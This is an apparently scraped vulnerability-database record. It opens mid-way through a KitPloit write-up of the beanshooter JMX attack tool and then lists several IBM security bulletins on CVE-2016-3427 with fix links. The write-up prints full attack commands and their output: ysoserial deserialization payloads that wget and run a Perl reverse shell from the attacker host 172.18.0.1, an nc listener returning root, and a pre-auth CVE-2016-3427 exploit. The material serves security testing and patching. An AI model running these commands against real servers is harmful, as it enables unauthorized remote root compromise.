Status of malicious Bean... done! \n [+]\tmalicious Bean is not registered on the JMX server. \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 1 72.18.0.2 9010 deployAll \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Creating MBean 'MLet' for remote deploymet... failed! \n [-] The following exception was thrown: java.lang.SecurityException: Access denied! Creating an MBean that is a ClassLoader is forbidden unless a security manager is installed.\n\nIn these cases it might still be possible to attack the _JMX_ endpoint by using _deserialization attacks_. To allow such attacks, the [ysoserial](<https://github.com/frohoff/ysoserial> \"ysoserial\" ) project can be integrated to _beanshooter_ by specifying the path to the corresponding _ysoserial .jar_ file. This can be configured either in the configuration file or by using the `--yso` command line option. The default location is `/opt/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar`.\n\nWith _ysoserial_ setup correctly, one can attempt a [deserialization](<https://www.kitploit.com/search/label/Deserialization> \"deserialization\" ) attack against the target:\n \n \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 172.18.0.2 9010 ysoserial CommonsCollections6 \"wget -O /dev/shm/s.pl http://172.18.0.1:8000/shell.pl\" \n [+] Creating ysoserial payload...done. \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConnection... done! \n [+] \n [+] Sending payload to 'getLoggerLevel'... \n [+] IllegalArgumentException. This is fine :) Payload probably worked. \n [qtc@kali ~]$ beanshooter --ssl --username controlRole --password control 172.18.0.2 9010 ysoserial CommonsCollections6 \"perl /dev/shm/s.pl\" \n [+] Creating ysoserial payload...done. \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... done! \n [+] Creating MBeanServerConn ection... done! \n [+] \n [+] Sending payload to 'getLoggerLevel'... \n [+] IllegalArgumentException. This is fine :) Payload probably worked. \n \n [qtc@kali ~]$ nc -vlp 4444 \n Ncat: Version 7.80 ( https://nmap.org/ncat ) \n Ncat: Listening on :::4444 \n Ncat: Listening on 0.0.0.0:4444 \n Ncat: Connection from 172.18.0.2. \n Ncat: Connection from 172.18.0.2:45994. \n id \n uid=0(root) gid=0(root) groups=0(root)\n\nOlder _JMX_ instances might also be vulnerable to _CVE-2016-3427_, which is basically a _pre-auth_ deserialization vulnerability. Whereas the above deserialization attack should work against the _RMI_ based connector as well as against _JMXMP_ based connector, the _pre-auth_ attack only works against the _RMI_ based connector:\n \n \n [qtc@kali ~]$ beanshooter --ssl 172.18.0.2 9010 cve-2016-3427 CommonsCollections6 \"perl /dev/shm/s.pl\" \n [+] Creating ysoserial payload...done. \n [+] cve-2016-3427 - Sending serialized Object as credential. \n [+] An exception during the connection attempt is expected. \n [+] Connecting to JMX server... \n [+] RMI object tries to connect to different remote host: iinsecure.dev \n [+] Redirecting the connection back to 172.18.0.2... failed! \n [*] \n [*] Caught SecurityException with content 'Authentication failed! Credentials should be String[] instead of java.util.HashSet'. \n [*] Target is most likely vulnerable to cve-2016-3427. \n \n [qtc@kali ~]$ nc -vlp 4444 \n Ncat: Version 7.80 ( https://nmap.org/ncat ) \n Ncat: Listening on :::4444 \n Ncat: Listening on 0.0.0.0:4444 \n Ncat: Connection from 172.18.0.2. \n Ncat: Connection from 172.18.0.2:46000. \n id \n uid=0(root) gid=0(root) groups=0(root)\n\n \n**Advanced Usage** \n\n\nAbove it was already mentioned that _beanshooter_ can read options from a configuration file. Options that would require long values, like the name of the _MBean_ class or the corresponding _ObjectName_ can only be passed inside of the configuration file. The following snipped shows you the default configuration file that is used by _beanshooter_ internally:\n \n \n defaultCmd=id \n stagerPort=8080 \n stagerHost=127.0.0.1 \n \n username= \n password= \n boundName=jmxrmi \n \n jarPath=/opt/beanshooter/tonka-bean/target/ \n jarName=tonka-bean.jar \n \n ysoserial=/opt/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar \n \n mLetName=DefaultDomain:type=MLet \n beanClass=de.qtc.tonkabean.TonkaBean \n objectName=MLetTonkaBean:name=TonkaBean,id=1\n\nIt is possible to overwrite each option by specifying a custom configuration file using the `--config` parameter. The custom config file does not need to contain all options. Options that are not present were simply set to the default value. If you want your custom configuration to apply for each usage of _beanshooter_, you can also modify the [config.properties](<https://github.com/qtc-de/beanshooter/blob/master/src/config.properties> \"config.properties\" ) file inside of the [src](<https://github.com/qtc-de/beanshooter/blob/master/src> \"src\" ) folder before compiling the project.\n\nIn situations where the targeted server cannot access your host because of restrictive firewall rules, you may be able to use the `--remote-stager` option to specify a remote stager host. If you have access to the _remote-stager_, you can also use _beanshooter_ to deploy the _MBean_ by using the `--stager-only` option, which only spawns the _HTTP_ listener. When using this option, no additional command line parameters are required. However, on your attacking machine you still need to specify the correct `--stager-host`, either by using command line options or a configuration file.\n\n \n**Why beanshooter** \n\n\nHere are some of the advantages why you may choose _beanshooter_ in favor of other _JMX_ scanning solutions:\n\n * Full _SSL_ support for _JMX_ objects and the _rmiregistry_\n * Automatic redirection for objects bound to e.g. _localhost_\n * Full _JMXMP_ support with almost all available authentication options\n * _ysoserial_ integration to test for insecure deserialization\n * _CVE-2016-3427_ detection\n * Autocompletion for _bash_\n * Vulnerable docker container to run tests against\n \n**Credits** \n\n\n * The initial idea and also the initial codebase of the tool were taken from [this blogpost](<https://www.optiv.com/blog/exploiting-jmx-rmi> \"this blogpost\" ).\n * For the _JMXMP_ implementation, [this project](<https://github.com/felixoldenburg/jmxmp-lifecycle-listener> \"this project\" ) was really helpful.\n * Some functionalities were inspired by the [mjet project](<https://github.com/mogwailabs/mjet> \"mjet project\" )\n\nCopyright 2020, Tobias Neitzel and the _beanshooter_ contributors.\n\n \n \n\n\n**[Download Beanshooter](<https://github.com/qtc-de/beanshooter> \"Download Beanshooter\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-22T12:30:00", "type": "kitploit", "title": "Beanshooter - JMX Enumeration And Attacking Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2021-07-22T12:30:00", "id": "KITPLOIT:7314019160937441300", "href": "http://www.kitploit.com/2021/07/beanshooter-jmx-enumeration-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2023-02-21T01:52:10", "description": "## Summary\n\nThe IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 1.7, that is used by IBM SPSS Analytic Server, contains an unspecified vulnerability related to the JMX component. The vulnerability allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX. \n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \nDESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\n \nIBM SPSS Analytic Server 2.0.0.0\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nSPSS Analytic Server| _2.0.0.0_| [_http://www-01.ibm.com/support/docview.wss?uid=swg24042335_](<http://www-01.ibm.com/support/docview.wss?uid=swg24042335>) \n \nYou should verify applying this fix does not cause any compatibility issue in your environment. \n \nIf you change the default setting after applying the fix, you will expose yourself to the attack described above. IBM recommends that you review your entire environment to identify other areas where you have enabled the Diffie-Hellman key-exchange protocol used in TLS and take appropriate mitigation and remediation actions. \n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-16T13:40:55", "type": "ibm", "title": "Security Bulletin: An unspecified JMX component vulnerability affects IBM SPSS Analytic Server (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-16T13:40:55", "id": "3B175B8B601A430DE67B3C46FDC9F27CED4587673E54755AD2690781ED1CB235", "href": "https://www.ibm.com/support/pages/node/280895", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:41", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae SDK Java\u2122 Technology Edition, Version 6 that is used by Rational Insight. The issue was disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nRational Insight 1.1, 1.1.1, 1.1.1.1 and 1.1.1.2| Cognos BI 10.1.1 \nRational Insight 1.1.1.3| Cognos BI 10.2.1 \nRational Insight 1.1.1.4, 1.1.1.5 and 1.1.1.6| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 5.0, 5.0.1 and 5.0.2 \nRational Insight 1.1.1.7| Cognos BI 10.2.1 Fix pack 2 \nJazz Reporting Service 6.0 \n \n## Remediation/Fixes\n\n \nApply the recommended fixes to all affected versions of Rational Insight. \n \n**Rational Insight 1.1 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 19 (Implemented by file 10.1.6306.509)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>). \nReview technote [1679272: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Insight 1.1](<http://www-01.ibm.com/support/docview.wss?uid=swg21679272>) for detailed instructions.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1, 1.1.1.1 and 1.1.1.2 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.1.1 Interim Fix 19 (Implemented by file 10.1.6306.509)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>). \nRead technote [1679281: Install a Cognos Business Intelligence 10.1.1 fix package in Rational Reporting for Development Intelligence 2.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679281>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.3 ** \n \n\n\n * Download the [IBM Cognos Business Intelligence 10.2.1 Interim Fix 17 (Implemented by file 10.2.5000.528)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n \n[](<http://www-01.ibm.com/support/docview.wss?uid=swg24035869>)**Rational Insight 1.1.1.4 and 1.1.1.5 and 1.1.1.6 and 1.1.1.7 ** \n \n\n\n 1. If the Data Collection Component (DCC) or Jazz Reporting Service (JRS, also known as Report Builder) is used, perform this step first. \nReview the topics in [Security Bulletin: A security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21983302>) for addressing the listed vulnerability in the underlying Jazz Team Server. \n\n 2. If the Cognos-based reporting server is used, also perform this step. \nDownload the [IBM Cognos Business Intelligence 10.2.1.1 Interim Fix 16 (Implemented by file 10.2.5010.512)](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>). \nReview technote [1679283: Installing Cognos Business Intelligence 10.2.1.x fix pack in Rational Reporting for Development Intelligence 2.0.x/5.0.x and Rational Insight 1.1.1.x](<http://www-01.ibm.com/support/docview.wss?uid=swg21679283>) for the detailed instructions for patch application.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T05:13:33", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java SDK affects Rational Insight (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-17T05:13:33", "id": "45B8083C191232F81D36077A9DB997569CBCDF51915A12038301F1630F4EE215", "href": "https://www.ibm.com/support/pages/node/279265", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:47", "description": "## Summary\n\nJazz Team Server is shipped as a component of Jazz Reporting Service (JRS). Information about a security vulnerabilities affecting Jazz Team Server and Jazz-based products has been published in a security bulletin. \n\n## Vulnerability Details\n\nConsult the security bulletin [Security Bulletin: Vulnerability in IBM\u00ae Java SDK affects multiple IBM Rational products based on IBM Jazz technology (CVE-2016-3427)](<http://www-01.ibm.com/support/docview.wss?uid=swg21983782>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product(s) and Version(s) \n---|--- \nJRS 5.0, 5.0.1, and 5.0.2| Jazz Foundation 5.0, 5.0.1, 5.0.2 \nJRS 6.0, 6.0.1, and 6.0.2| Jazz Foundation 6.0, 6.0.1, 6.0.2 \n* Both JRS and Jazz Foundation are part of Rational Collaborative Lifecycle Management. \n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-17T05:13:33", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in Jazz Team Server shipped with Jazz Reporting Service (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-17T05:13:33", "id": "AAA4733E548388B933C5FBCDCA4EFEA642E359C79EA119CE1225DE33E6D4A575", "href": "https://www.ibm.com/support/pages/node/279261", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:15", "description": "## Summary\n\nThere is a vulnerability in IBM SDK Java\u2122 Technology Edition that is used by IBM Integration Designer and WebSphere Integration Developer. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nThis vulnerability affects IBM Integration Designer and WebSphere Integration Developer.\n\n## Remediation/Fixes\n\nTo fully mitigate these vulnerabilities, an additional fix (JR55856) is required for the following product versions: \n\n\n * [WebSphere Integration Developer V7.0.0.x](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Integration+Developer&fixids=7.0.0.5-WS-IID-IFJR55856>)\n * [IBM Integration Designer V7.5.1.2](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=7.5.1.2-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.0.1.3](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.0.1.3-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.0.1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.0.1-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.5.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.5.0-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.6.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.6.0-WS-IID-IFJR55856>)\n * [IBM Integration Designer V8.5.7.0](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FIBM+Integration+Designer&fixids=8.5.7.0-WS-IID-IFJR55856>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T07:05:37", "type": "ibm", "title": "Security Bulletin: Vulnerability in IBM Java\u2122 SDK affects IBM Integration Designer and WebSphere Integration Developer (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T07:05:37", "id": "4733D43646C8A9049B8454CA406366CE2D5051464AA128020F19F4299F6FC6E4", "href": "https://www.ibm.com/support/pages/node/278837", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:54:49", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Version 6 that is used by IBM Cognos Planning. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Cognos Planning 10.1 \n\nIBM Cognos Planning 10.1.1\n\n## Remediation/Fixes\n\nPlease apply fixes available at: \n\n[IBM Cognos Planning 10.1.1.7 Interim Fix 2](<http://www-01.ibm.com/support/docview.wss?uid=swg24042537>)\n\n \n[IBM Cognos Planning 10.1.0 Interim Fix 8](<http://www-01.ibm.com/support/docview.wss?uid=swg24042593>)\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:42:09", "type": "ibm", "title": "Security Bulletin: A security vulnerability in IBM Java Runtime affects IBM Cognos Planning (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T22:42:09", "id": "9CD14117A91708D3923BD78C3B0E27E442D14B8976544CB69E7166B29DBCC7C9", "href": "https://www.ibm.com/support/pages/node/540471", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:28", "description": "## Summary\n\nThere is a vulnerability in IBM\u00ae Runtime Environment Java\u2122 Versions 6 and 7 that are used by IBM Cognos Metrics Manager. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n\n\n## Affected Products and Versions\n\n * * IBM Cognos Metrics Manager 10.2.2\n * IBM Cognos Metrics Manager 10.2.1\n * IBM Cognos Metrics Manager 10.2\n * IBM Cognos Metrics Manager 10.1.1\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the fix as soon as practical. As the fix is in a shared component across the Business Intelligence portfolio, applying the BI Interim Fix will resolve the issue. Note that the prerequisites named in the links are also satisfied by an IBM Cognos Metrics Manager install of the same version. \n\n\n \n[IBM Cognos Business Intelligence 10.1.1 Interim Fixes](<http://www-01.ibm.com/support/docview.wss?uid=swg24042359>) \n[IBM Cognos Business Intelligence 10.2.x Interim Fixes](<http://www-01.ibm.com/support/docview.wss?uid=swg24042360>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T23:16:10", "type": "ibm", "title": "Security Bulletin: A vulnerability in IBM Java Runtime affects IBM Cognos Metrics Manager (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2018-06-15T23:16:10", "id": "A801B8C1EF0F6A4D59E8093D234C394269007D65A6E868D0FD1895AE417608B1", "href": "https://www.ibm.com/support/pages/node/282457", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:52:42", "description": "## Summary\n\nThere are vulnerabilities in IBM\u00ae Runtime Environments Java\u2122 Technology Edition, Versions 6 and 7, that is used by IBM Cognos Controller. These issues were disclosed as part of the IBM Java SDK updates in April 2016.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-3427_](<https://vulners.com/cve/CVE-2016-3427>)** \n****DESCRIPTION:** An unspecified vulnerability related to the JMX component has complete confidentiality impact, complete integrity impact, and complete availability impact. \nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112459_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112459>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM Cognos Controller 10.2.1 \n\nIBM Cognos Controller 10.2\n\nIBM Cognos Controller 10.1.1\n\nIBM Cognos Controller 10.1\n\n## Remediation/Fixes\n\n[IBM Cognos Controller 10.2.1 FP4 IF2](<http://www-01.ibm.com/support/docview.wss?uid=swg24042409>)\n\n[IBM Cognos Controller 10.2 FP1 IF6](<http://www-01.ibm.com/support/docview.wss?uid=swg24042408>)\n\n[IBM Cognos Controller 10.1.1 FP3 IF6](<http://www-01.ibm.com/support/docview.wss?uid=swg24042410>)\n\n \n \n_Users of IBM Cognos Controller v10.1 are advised to contact IBM Customer Support._\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-15T22:44:22", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in IBM Java Runtime affect IBM Cognos Controller (CVE-2016-3427)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 